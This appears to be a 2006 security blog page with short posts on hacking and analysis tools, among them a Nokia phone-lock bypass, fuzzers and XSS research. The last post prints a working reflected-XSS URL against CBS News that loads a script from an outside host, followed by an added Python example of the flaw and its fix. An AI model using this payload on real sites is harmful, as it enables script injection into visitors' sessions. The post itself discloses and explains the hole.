Wednesday, September 13, 2006

THC Nokia Phone-Lock Reset

The Hacker's Choice has released a tool, thc-nokia-unlock, that exploits a design flaw in Nokia mobile phones to remove the phone lock.

The Phone Lock feature is designed to disable the keypad, Bluetooth and the USB port. This is meant to make it impossible to access the data stored on the device without knowing the correct code.

This unlock tool makes use of some undocumented features of the Symbian OS, which is used in most Nokia phones. One such feature is a 'recognizer' that can be used to execute a program when the phone boots. A recognizer is loaded and executed when a drive is mounted.

The problem with the Phone Lock feature is that it does not disable the memory card (MMC). You can remove the memory card from a locked phone and install the 'thc-nokia-unlock' tool, which is in fact a recognizer that performs a hard reset (by software) on the phone.

The memory card is mounted as soon as it is placed back into the phone, even when the phone is locked, so the tool is executed.

The same recognizer-autostart method can be used to quickly install a backdoor on a locked mobile phone or to propagate a virus.

read more ...

Nmap Scripting Engine

From Buanzo's Consulting blog.
The Nmap-dev mailing list carries an announcement of the final release of the Nmap Scripting Engine. A sample script written by Buanzo for detecting SMTP open relays is available here.
read more ...

Tuesday, September 05, 2006

PaiMei reverse engineering framework

From pedram.redhive.com
PaiMei is a reverse engineering framework consisting of multiple extensible components. The framework can essentially be thought of as a reverse engineer's Swiss army knife and has already proven effective for a wide range of both static and dynamic tasks such as fuzzer assistance, code coverage tracking, data flow tracking and more.
read more ...

More tools from this site are available here.

Process Stalker

From pedram.redhive.com,
Process Stalking is a term coined to describe the combined process of run-time profiling, state mapping and tracing. Consisting of a series of tools and scripts, the goal of a successful stalk is to provide the reverse engineer with an intuitive interface to run-time block-level trace data.

The Process Stalking suite is broken into three main components: an IDA Pro plug-in, a stand-alone tracing tool and a series of Python scripts for instrumenting intermediary and GML graph files. The generated GML graph definitions were designed for use with a freely available interactive graph visualization tool.

A complete usage and script development manual for Process Stalker is available here.

An article detailing a step-by-step application of Process Stalker vs. the MS05-030 Microsoft Security bulletin is available at OpenRCE.org.
read more ...

eEye Research Tools

A lot of previously unreleased research tools are now available on the eEye research website, research.eEye.com.
read more ...

AxMan ActiveX fuzzing engine

From metasploit.com
AxMan is a web-based ActiveX fuzzing engine. The goal of AxMan is to discover vulnerabilities in COM objects exposed through Internet Explorer. Since AxMan is web-based, any security changes in the browser will also affect the results of the fuzzing process. This allows for a much more realistic test than other COM-based assessment tools. AxMan is designed to be used with Internet Explorer 6 only.
read more ...

AttackAPI

From gnucitizen.org
AttackAPI provides a simple and intuitive web-programmable interface for composing attack vectors with JavaScript and other client (and server) related technologies. The current release supports several browser-based attacking techniques and a simple but powerful JavaScript console.

read more ...

Other interesting projects from gnucitizen.org:
i) JavaScript Shell
ii) JavaScript Authorization Forcer
iii) JavaScript Port Scanner
iv) Fex - enables Firefox Extension Scanner
v) XSSing the Lan

Demystifying Cross Site Scripting Attacks

From David Kierznowski
Awaking the Sleeping Giant v1.0
Demystifying Cross Site Scripting Attacks
Author: David Kierznowski

This paper attempts to demystify and categorise current XSS entry nodes, attack capabilities and trends.

XSS attacks are gaining popularity quickly. There are loads of vulnerabilities waiting to be found. It can be both simple and difficult to prevent. It can propagate around the Internet in hours, exploit internal or private networks and offers the ability to manipulate web services for fun and profit without compromising a single system.

The whitepaper can be found here.

How to get linked from Slashdot

From Jeremiah Grossman's blog
A five-step process, making use of Slashdot's PreviewStory feature, to create URLs that link anywhere and say anything.
read more ...

Live View

From LiveView site
"...
Live View is a Java-based graphical forensics tool that creates a VMware virtual machine out of a raw (dd-style) disk image or physical disk. This allows the forensic examiner to "boot up" the image or disk and gain an interactive, user-level perspective of the environment, all without modifying the underlying image or disk. Because all changes made to the disk are written to a separate file, the examiner can instantly revert all of his or her changes back to the original pristine state of the disk. The end result is that one need not create extra "throw away" copies of the disk or image to create the virtual machine.
..."
read more ...

WildPackets OmniPeek Personal

" ...
OmniPeek Personal, the first commercially developed Expert network analyzer available free for personal use. OmniPeek Personal gives individual users the chance to experience the power and extensibility of WildPackets’ award-winning network analysis technology at no cost.

OmniPeek Personal offers:

* Best-in-class wired and wireless analysis in one application
* Intuitive real-time graphics and display with award-winning UI
* Powerful Visual Expert and Packet Visualizer toolsets
* Application analysis and Apdex scoring that reflects end user satisfaction with applications
* Plug-in extensibility

... "

OmniPeek provides more network analysis features and can be used as an alternative to Wireshark/Ethereal.

XSS Demonstration

SecurityLab posted a demonstration of Cross Site Scripting (XSS) vulnerabilities in CBS News and the BBC websites.

It looks like the BBC has now fixed this flaw on its website, but CBS News is still vulnerable.

The URL they provide for CBS is:
http://www.cbsnews.com/stories/2002/02/15/weather_local/main501644.shtml?zipcode=1--%3E%3Cscript%20src=http://www.securitylab.ru/test/sc.js%3E%3C/script%3E%3C!--

The problem lies in the zipcode parameter of the site's local weather lookup, which is reflected into the page unescaped.

In the above example, the script at http://www.securitylab.ru/test/sc.js is injected into the user's browser session.

The vulnerability can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of the affected site.
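The reflected injection above, as an added example that is not part of the original post or of SecurityLab's demonstration: the zipcode value (URL-decoded here as a constructed sample) lands inside an HTML comment, so the leading `-->` closes the comment and the script tag that follows becomes live markup. The page template, the function names and the five-digit validation rule are assumptions; the hardened renderer shows that validating and HTML-escaping the parameter keeps the comment intact.

```python
import html
import re

# Constructed sample: the zipcode value from the CBS News URL quoted above,
# URL-decoded (%3E -> '>', %3C -> '<', %20 -> space).
INJECTED_ZIPCODE = '1--><script src=http://www.securitylab.ru/test/sc.js></script><!--'

# Assumed page template: the parameter is reflected inside an HTML comment.
TEMPLATE = '<!-- weather for zip {zipcode} --><div id="weather"></div>'


def render_vulnerable(zipcode):
    """Interpolates the raw query parameter into the page (the flaw described above)."""
    return TEMPLATE.format(zipcode=zipcode)


def render_hardened(zipcode):
    """Rejects anything that is not a five-digit code, then HTML-escapes it.

    html.escape turns '>' into '&gt;', so even a value that slipped past
    validation could not spell '-->' and close the comment early.
    """
    if not re.fullmatch(r"\d{5}", zipcode):
        zipcode = "invalid"
    return TEMPLATE.format(zipcode=html.escape(zipcode, quote=True))


def live_script_sources(page):
    """Returns the src of every <script> tag that is outside an HTML comment.

    Commented-out markup is stripped first, so a script that only exists
    inside the comment (as the hardened page keeps it) is not reported.
    """
    uncommented = re.sub(r"<!--.*?-->", "", page, flags=re.S)
    return re.findall(r"<script[^>]*\bsrc=([^\s>]+)", uncommented, flags=re.I)


if __name__ == "__main__":
    print("vulnerable:", live_script_sources(render_vulnerable(INJECTED_ZIPCODE)))
    print("hardened:  ", live_script_sources(render_hardened(INJECTED_ZIPCODE)))
```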

read more ...